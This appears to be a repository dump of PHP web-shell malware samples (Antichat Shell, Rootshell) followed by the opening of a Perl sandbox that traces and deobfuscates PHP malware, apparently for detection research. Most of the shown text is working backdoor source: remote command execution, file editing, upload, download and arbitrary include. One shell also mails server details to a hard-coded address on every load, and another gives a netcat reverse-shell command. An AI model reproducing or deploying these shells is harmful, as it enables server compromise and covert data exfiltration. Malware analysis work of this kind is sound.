124 | 		@sort($files);
125 | 		
126 | echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
127 | echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
128 | if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
129 | echo "<tr><td>Select drive:";
130 | for ($j=ord('C'); $j<=ord('Z'); $j++) 
131 |  if (@$dh = opendir(chr($j).":/"))
132 |  echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
133 |  echo "</td></tr>";
134 | }
135 | echo "<tr><td>OS: ".@php_uname()."</td></tr>
136 | <tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
137 | for($i=0;$i<count($dire);$i++) {
138 | $link=$dir.$dire[$i];
139 |   echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';  
140 |   }
141 | for($i=0;$i<count($files);$i++) {
142 | $linkfile=$dir.$files[$i];
143 | echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
144 | <td>'.perms($linkfile).'</td>
145 | <td>
146 | <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
147 | <a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>'; 
148 | }
149 | echo "</table>";
150 | }}}
151 | 
152 | if($action=="viewer"){
153 | scandire($dir);
154 | }
155 | //end viewer FS
156 | 
157 | //editros
158 | if($action=="editor"){  
159 |   function writef($file,$data){
160 |   $fp = fopen($file,"w+");
161 |   fwrite($fp,$data);
162 |   fclose($fp);
163 |   }
164 |   function readf($file){
165 |   if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
166 |   $contents = fread($le, filesize($file));
167 |   fclose($le);}
168 |   return htmlspecialchars($contents);
169 |   }
170 | if($_POST['save'])writef($file,$_POST['data']);
171 | echo "<form method=\"POST\">
172 | <input type=\"hidden\" name=\"action\" value=\"editor\">
173 | <input type=\"hidden\" name=\"file\" value=\"".$file."\">
174 | <textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
175 | <input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
176 | }
177 | //end editors
178 | ?>
179 | </td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
180 | <? echo $footer;?>
181 | 


--------------------------------------------------------------------------------
/t/malware/8.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | session_start();
  4 | set_time_limit(9999999);
  5 | $login='virangar';
  6 | $password='r00t';
  7 | $auth=1;
  8 | $version='version 1.3 by Grinay';
  9 | $style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
 10 | $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
 11 | $footer='</body></html>';
 12 | $sd98 = "john.barker446@gmail.com";
 13 | $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
 14 | if(@$_POST['action']=="exit")unset($_SESSION['an']);
 15 | if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
 16 | 
 17 | if($_SESSION['an']==0){
 18 | echo $header;
 19 | echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
 20 | echo $footer;
 21 | exit;}
 22 | 
 23 | if($_SESSION['action']=="")$_SESSION['action']="viewer";
 24 | if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
 25 | if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
 26 | if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
 27 |  
 28 | 
 29 | //downloader
 30 | if($action=="download"){ 
 31 | header('Content-Length:'.filesize($file).'');
 32 | header('Content-Type: application/octet-stream');
 33 | header('Content-Disposition: attachment; filename="'.$file.'"');
 34 | readfile($file);
 35 | }
 36 | //end downloader
 37 | ?>
 38 | 
 39 | <? echo $header;?> 
 40 | <table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
 41 | <table><tr>
 42 | <td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
 43 | <td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
 44 | <td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
 45 | <td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
 46 | </tr></table></td></tr></table><br>
 47 | <form name='reqs' method='POST'>
 48 | <input name='action' type='hidden' value=''>
 49 | <input name='dir' type='hidden' value=''>
 50 | <input name='file' type='hidden' value=''>
 51 | </form>
 52 | <table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
 53 | <tr><td width="100%" valign="top">
 54 | 
 55 | <?
 56 | 
 57 | //shell
 58 | function shell($cmd){
 59 | if (!empty($cmd)){
 60 |   $fp = popen($cmd,"r");
 61 |   {
 62 |     $result = "";
 63 |     while(!feof($fp)){$result.=fread($fp,1024);}
 64 |     pclose($fp);
 65 |   }
 66 |   $ret = $result;
 67 |   $ret = convert_cyr_string($ret,"d","w");
 68 | }
 69 | return $ret;}
 70 | 
 71 | if($action=="shell"){
 72 | echo "<form method=\"POST\">
 73 | <input type=\"hidden\" name=\"action\" value=\"shell\">
 74 | <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
 75 | <textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
 76 | <input type=\"submit\" value=\"execute\"></form>";}
 77 | //end shell
 78 | 
 79 | //viewer FS
 80 | function perms($file) 
 81 | { 
 82 |   $perms = fileperms($file);
 83 |   if (($perms & 0xC000) == 0xC000) {$info = 's';} 
 84 |   elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
 85 |   elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
 86 |   elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
 87 |   elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
 88 |   elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
 89 |   elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
 90 |   else {$info = 'u';}
 91 |   $info .= (($perms & 0x0100) ? 'r' : '-');
 92 |   $info .= (($perms & 0x0080) ? 'w' : '-');
 93 |   $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
 94 |   $info .= (($perms & 0x0020) ? 'r' : '-');
 95 |   $info .= (($perms & 0x0010) ? 'w' : '-');
 96 |   $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
 97 |   $info .= (($perms & 0x0004) ? 'r' : '-');
 98 |   $info .= (($perms & 0x0002) ? 'w' : '-');
 99 |   $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
100 |   return $info;
101 | } 
102 | 
103 | function view_size($size)
104 | {
105 |  if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
106 |  elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
107 |  elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
108 |  else {$size = $size . " B";}
109 |  return $size;
110 | }
111 | 
112 | function scandire($dir){
113 |   $dir=chdir($dir);
114 |   $dir=getcwd()."/";
115 |   $dir=str_replace("\\","/",$dir);
116 | if (is_dir($dir)) {
117 |     if (@$dh = opendir($dir)) {
118 |         while (($file = readdir($dh)) !== false) {
119 | 		  if(filetype($dir . $file)=="dir") $dire[]=$file;
120 | 		  if(filetype($dir . $file)=="file")$files[]=$file;
121 | 		}
122 | 		closedir($dh);
123 | 		@sort($dire);
124 | 		@sort($files);
125 | 		
126 | echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
127 | echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
128 | if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
129 | echo "<tr><td>Select drive:";
130 | for ($j=ord('C'); $j<=ord('Z'); $j++) 
131 |  if (@$dh = opendir(chr($j).":/"))
132 |  echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
133 |  echo "</td></tr>";
134 | }
135 | echo "<tr><td>OS: ".@php_uname()."</td></tr>
136 | <tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
137 | for($i=0;$i<count($dire);$i++) {
138 | $link=$dir.$dire[$i];
139 |   echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';  
140 |   }
141 | for($i=0;$i<count($files);$i++) {
142 | $linkfile=$dir.$files[$i];
143 | echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
144 | <td>'.perms($linkfile).'</td>
145 | <td>
146 | <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
147 | <a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>'; 
148 | }
149 | echo "</table>";
150 | }}}
151 | 
152 | if($action=="viewer"){
153 | scandire($dir);
154 | }
155 | //end viewer FS
156 | 
157 | //editros
158 | if($action=="editor"){  
159 |   function writef($file,$data){
160 |   $fp = fopen($file,"w+");
161 |   fwrite($fp,$data);
162 |   fclose($fp);
163 |   }
164 |   function readf($file){
165 |   if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
166 |   $contents = fread($le, filesize($file));
167 |   fclose($le);}
168 |   return htmlspecialchars($contents);
169 |   }
170 | if($_POST['save'])writef($file,$_POST['data']);
171 | echo "<form method=\"POST\">
172 | <input type=\"hidden\" name=\"action\" value=\"editor\">
173 | <input type=\"hidden\" name=\"file\" value=\"".$file."\">
174 | <textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
175 | <input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
176 | }
177 | //end editors
178 | ?>
179 | </td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
180 | <? echo $footer;?>
181 | 


--------------------------------------------------------------------------------
/t/malware/90.php:
--------------------------------------------------------------------------------
  1 | <!--
  2 | /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
  3 | /*  ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
  4 | /*  .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
  5 | /*  ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
  6 | /*  .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
  7 | /*  ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
  8 | /*  ..^..^.....^..^..?WN0`` `  +llz:`    .dHR:..^.......^..^... */
  9 | /*  ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
 10 | /*  ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
 11 | /*  ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
 12 | /*  ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
 13 | /*  ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
 14 | /*  .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
 15 | /*  ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
 16 | /*  ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
 17 | /*  OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
 18 | /*  .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
 19 | /*  ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
 20 | /*  ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
 21 | /*  dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
 22 | /*  ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
 23 | /*  .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
 24 | /*  ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
 25 | /*  ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
 26 | /*  ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
 27 | /*  .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
 28 | /*  ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
 29 | /*  ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
 30 | /*  .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
 31 | /*  ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
 32 | /*  ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
 33 | /*  ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
 34 | /*  ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
 35 | /*  ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
 36 | /*  .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
 37 | /*  ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
 38 | /*  .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
 39 | /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
 40 | /*
 41 | /*    We should take care some kind of history, i will add here to keep a trace of changes (who made it).
 42 | /*    Also I think we should increase the last version number by 1 if you make some changes.
 43 | /*
 44 | /*    CHANGES / VERSION HISTORY:
 45 | /*    ====================================================================================
 46 | /*    Version        Nick            Description
 47 | /*    - - - - - - - - - - - - - - - - - - - - - - - - - - -
 48 | /*    0.3.1          666            added an ascii bug :)
 49 | /*    0.3.1          666            password protection
 50 | /*    0.3.1          666            GET and POST changes
 51 | /*    0.3.2          666            coded a new uploader
 52 | /*    0.3.2          666            new password protection
 53 | /*    0.3.3          666            added a lot of comments :)
 54 | /*    0.3.3          666            added "Server Info"
 55 | /*    1.0.0          666            added "File Inclusion"
 56 | /*    1.0.0          666            removed password protection (nobody needs it...)
 57 | /*    1.0.0          666            added "Files & Directories"
 58 | /*
 59 | /*
 60 | -->
 61 | <?
 62 | //
 63 | // Default Changes
 64 | //    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 65 | 
 66 | $owner        = "Hacker";                                                       // Insert your nick
 67 | $version      = "1.0.0";                                                        // The version    
 68 | 
 69 | //    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
 70 | //
 71 | ?>
 72 | 
 73 | <body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
 74 | <style type="text/css">
 75 | body{
 76 | cursor:crosshair 
 77 | }
 78 | </style>
 79 | <div align="center" style="width: 100%; height: 100">
 80 | <pre width="100%" align="center"><strong> ____             _         ____  _          _ _
 81 | |  _ \ ___   ___ | |_      / ___|| |__   ___| | |
 82 | | |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
 83 | |  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
 84 | |_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
 85 | </div></strong>
 86 | <b><u><center><?php echo "This server has been infected by $owner"; ?></center></u></b>
 87 | <hr color="#000000" size="2,5">
 88 | 
 89 | <div align="center">
 90 |   <center>
 91 |   <p>
 92 |   <?php 
 93 | // Check for safe mode
 94 | if( ini_get('safe_mode') ) {
 95 |    print '<font color=#FF0000><b>Safe Mode ON</b></font>';
 96 | } else {
 97 |    print '<font color=#008000><b>Safe Mode OFF</b></font>';
 98 | }
 99 | 
100 | ?>
101 | &nbsp;</p><font face="Webdings" size="6">!</font><br>
102 | &nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
103 |     <tr>
104 |       <td width="1%" height="25" bgcolor="#FCFEBA">
105 |       <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
106 |     </tr>
107 |     <tr>
108 |       <td width="49%" height="142">
109 |       <p align="center">
110 |         <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
111 |         <br />
112 |         <b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
113 |         <br>
114 |         <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
115 |         <b>Server Name:</b> <? echo $SERVER_NAME ?><br>
116 |         <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
117 |         </font></tr>
118 |   </table><br />
119 |     <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
120 |     <tr>
121 |       <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
122 |       <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
123 |       <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
124 |       <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
125 |     </tr>
126 |     <tr>
127 |       <td width="49%" height="142">
128 |       <p align="center"><form method="post">
129 | <p align="center">
130 | <br>
131 | <font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
132 | <br>
133 | <textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
134 | <br><input type="submit" value="Execute!"><br>
135 | &nbsp;<br></p>
136 |       </form>
137 |       <p align="center">
138 |         <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
139 |         <br>
140 |         <font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect 
141 |         back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
142 |         </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
143 | <form enctype="multipart/form-data" method="post">
144 | <p align="center"><br>
145 | <br>
146 | <font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
147 | <br>
148 | <input type="file" name="file" size="20"><br>
149 | <br>
150 | <font style="font-size: 5pt">&nbsp;</font><br>
151 | <input type="submit" value="Upload File!"> <br>
152 | &nbsp;</p>
153 | </form>
154 | <?php
155 | 
156 | function check_file()
157 | {
158 | global $file_name, $filename;
159 |     $backupstring = "copy_of_";
160 |     $filename = $backupstring."$filename";
161 | 
162 |     if( file_exists($filename))
163 |     {
164 |         check_file();
165 |     }
166 | }
167 | 
168 | if(!empty($file))
169 | {
170 |     $filename = $file_name;
171 |     if( file_exists($file_name))
172 |     {
173 |         check_file();
174 |         echo "<p align=center>File already exist</p>";
175 |     }
176 | 
177 |     else
178 |     {
179 |         copy($file,"$filename");
180 |         if( file_exists($filename))
181 |         {
182 |             echo "<p align=center>File uploaded successful</p>";
183 |         }
184 |         elseif(! file_exists($filename))
185 |         {
186 |             echo "<p align=center>File not found</p>";
187 |         }
188 |     }
189 | }
190 | ?> 
191 | <font face="Verdana" style="font-size: 8pt">
192 | <p align=\"center\"></font>
193 | </td>
194 | 
195 |       </tr>
196 |     <tr>
197 |       <td width="49%" height="25" bgcolor="#FCFEBA">
198 |       <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
199 |       <td width="51%" height="19" bgcolor="#FCFEBA">
200 |       <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
201 |     </tr>
202 |     <tr>
203 |       <td width="49%" height="231">
204 |       <form method="post">
205 | <p align="center">
206 | <font face="Verdana" style="font-size: 11pt">
207 | <?
208 | $folder=opendir('./');
209 | while ($file = readdir($folder)) {
210 | if($file != "." && $file != "..")
211 | echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
212 | }
213 | closedir($folder);
214 | ?></p>
215 |       </form>
216 |       <p align="center">
217 |       <br>
218 |         &nbsp;<p align="center">&nbsp;</td>
219 |       <td width="51%" height="232">
220 |       <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
221 |       Include 
222 |       something :)<br>
223 |       <br>
224 | &nbsp;</font><form method="POST">
225 |        <p align="center">
226 |         <input type="text" name="incl" size="20"><br>
227 |         <br>
228 |         <input type="submit" value="Include!" name="inc"></p>
229 |       </form>
230 |       <?php @$output = include($_POST['incl']); ?>
231 |       </td>
232 |     </tr>
233 |   </table>
234 |   </center>
235 | </div>
236 | <br /></p>
237 | <div align="center">
238 |   <center>
239 |   <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
240 |     <tr>
241 |       <td width="100%" bgcolor="#FCFEBA" height="20">
242 |       <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?>  2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.de.tt">SR-Crew</a> </font></td>
243 |     </tr>
244 |   </table>
245 |   </center>
246 | </div> 


--------------------------------------------------------------------------------
/server/sandbox.psgi:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env perl
  2 | use strict;
  3 | use warnings;
  4 | use YAML;
  5 | use Plack::Request;
  6 | use File::Copy;
  7 | use Digest::MD5;
  8 | use HTTP::Request::Common;
  9 | use LWP::UserAgent;
 10 | use File::Path 'mkpath';
 11 | use Data::Dumper;
 12 | use JSON qw(encode_json decode_json);
 13 | use File::Temp qw/ tempfile tempdir /; 
 14 | use FindBin qw($Bin);
 15 | use lib "$Bin/../lib";
 16 | use K0U5UK3::Error qw($DEBUG $WARNING debug warning critical);
 17 | use K0U5UK3::Util qw(read_file cleanup get_md5);
 18 | use K0U5UK3::OPWD qw();
 19 | 
 20 | our $YAML = YAML::LoadFile("$Bin/../settings.yaml");
 21 | 
 22 | #------------#
 23 | # SUB ROUTIN # 
 24 | #------------#
 25 | 
 26 | #---------------------------------------------------------------------
 27 | # parse_tracelogはハッシュリファレンスとリストリファレンスを返す。
 28 | # ハッシュリファレンスは関数名と呼び出し回数を保持しており
 29 | # リストリファレンスは関数を呼び出し順に関数名とパラメータを保持する
 30 | #---------------------------------------------------------------------
 31 | sub parse_tracelog($){
 32 |    my $tracelog = shift;
 33 |    my %func_count;
 34 |    my @stack_trace;
 35 |    my ($START_FLAG, $END_FLAG);
 36 | 
 37 |    open my $fh, '<', $tracelog or die "Failed open $tracelog : $!\n";
 38 |    while(<$fh>){
 39 |       if($_ =~ /^TRACE\sSTART/){ $START_FLAG=1};
 40 |       if($_ =~ /^TRACE\sEND/){   $END_FLAG=1  };
 41 |       if($START_FLAG && !$END_FLAG){
 42 |          my @col = split("\t", $_);
 43 |          if(defined $col[2] && $col[2] eq '0'){
 44 |             #関数呼び出しのみを解析対象とする。
 45 |             my $func_name = $col[5];
 46 |             # 関数呼び出し回数集計
 47 |             $func_count{$func_name}++;
 48 |             # stack_trace作成
 49 |             my @param;
 50 |             if($func_name eq 'eval'){
 51 |                #evalの場合は7番にパラメータが入る
 52 |                push(@param,$col[7]);               
 53 |             }else{
 54 |                @param = @col[11..$#col];
 55 |             }
 56 |             push(@stack_trace, [$func_name, @param]);
 57 |          }
 58 |       }
 59 |    }
 60 |    close($fh);
 61 | 
 62 |    return (\%func_count, \@stack_trace);
 63 | }
 64 | 
 65 | 
 66 | 
 67 | sub escape2control($){
 68 |    my $string = shift;
 69 |    # 先頭と行末のシングルクォーテションを削除
 70 |    $string =~ s/^\'//;
 71 |    $string =~ s/\'$//;
 72 | 
 73 |    # エスケープシーケンスを制御文字に変換
 74 |    $string =~ s/\\r\\n/\x{0a}/g;
 75 |    $string =~ s/\\n/\x{0a}/g;
 76 |    $string =~ s/\\t/\x{09}/g; 
 77 | 
 78 |    $string =~ s/\\//g;
 79 |    return $string;
 80 | }
 81 | 
 82 | sub deobfusucate($){
 83 |    my $stack_trace = shift;
 84 |    my @ret;
 85 | 
 86 |    foreach my $tmp (@$stack_trace){
 87 |       my $deobfusucate;
 88 |       if($tmp->[0] eq 'eval'){
 89 |          $deobfusucate = escape2control($tmp->[1]);
 90 |       }
 91 |       if($tmp->[0] eq 'create_function'){
 92 |          $deobfusucate = escape2control($tmp->[2]);
 93 |       }
 94 |       if($tmp->[0] eq 'assert'){
 95 |          $deobfusucate = escape2control($tmp->[1]);
 96 |       }
 97 |       push(@ret, $deobfusucate);
 98 |    }
 99 |    return \@ret;
100 | }
101 | 
102 | sub strip_php_code($){
103 |    my $code = shift;
104 |    my $fh = new File::Temp();
105 |    my $file = $fh->filename;
106 |    print $fh $code;
107 |    my $strip = qx{ /usr/bin/php -w $file } ;
108 |    return $strip;
109 | }
110 | 
111 | sub detect_obfuscate($){
112 |    my $info = shift;
113 |    my @msg;
114 |    
115 |    # このフラグが両方立った時、難読化ファイルとして判定する
116 |    # これは復号処理のための関数と、
117 |    # 再評価のための関数が難読化ファイルの実行のために必要であるため
118 |    my ($eval_flag, $deobfuscate_flag);
119 | 
120 |    # コード再評価のための関数
121 |    # preg_replaceのeオプションは内部でevalとして処理されるので含めない
